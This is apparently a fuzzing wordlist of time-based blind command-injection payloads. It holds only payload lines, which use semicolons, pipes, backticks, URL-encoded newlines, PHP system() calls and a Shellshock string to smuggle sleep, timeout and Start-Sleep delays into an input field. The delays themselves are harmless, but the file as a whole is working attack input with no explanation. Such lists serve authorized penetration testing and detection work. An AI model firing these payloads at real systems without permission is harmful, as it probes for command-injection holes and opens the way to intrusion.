;sleep 4;
|sleep 4#
|/usr/bin/sleep 4#
|/usr/bin/sleep 4|
|sleep 4;
& sleep 4;
;sleep 4|
`sleep 4`
`/usr/bin/sleep 4`
;system('sleep 4')
;system('/usr/bin/sleep 4')
%0A/usr/bin/sleep 4
%0Asleep 4
%0A/usr/bin/sleep 4%0A
%0Asleep 4%0A
%0a sleep 4 %0a
`sleep 4`
() { :;}; /bin/bash -c "sleep 4"
;timeout 4
|timeout 4
|C:\Windows\System32\timeout.exe 4
|timeout 4|
|C:\Windows\System32\timeout.exe 4|
|timeout 4;
;timeout 4|
;system('timeout 4')
;system('C:\Windows\System32\timeout.exe 4')
%0AC:\Windows\System32\timeout.exe 4
%0Atimeout 4
%0AC:\Windows\System32\timeout.exe 4%0A
%0Atimeout 4%0A
| timeout 4
& timeout 4
; timeout 4
%0a timeout 4 %0a
&& FOR /F "delims=" %i IN ('timeout 4') DO echo 1
;Start-Sleep -s 4;
;Start-Sleep -s 4
|Start-Sleep -s 4
|Start-Sleep -s 4|
|Start-Sleep -s 4;
;Start-Sleep -s 4|
;system('Start-Sleep -s 4')
%0AStart-Sleep -s 4%0A
%0a Start-Sleep -s 4 %0a
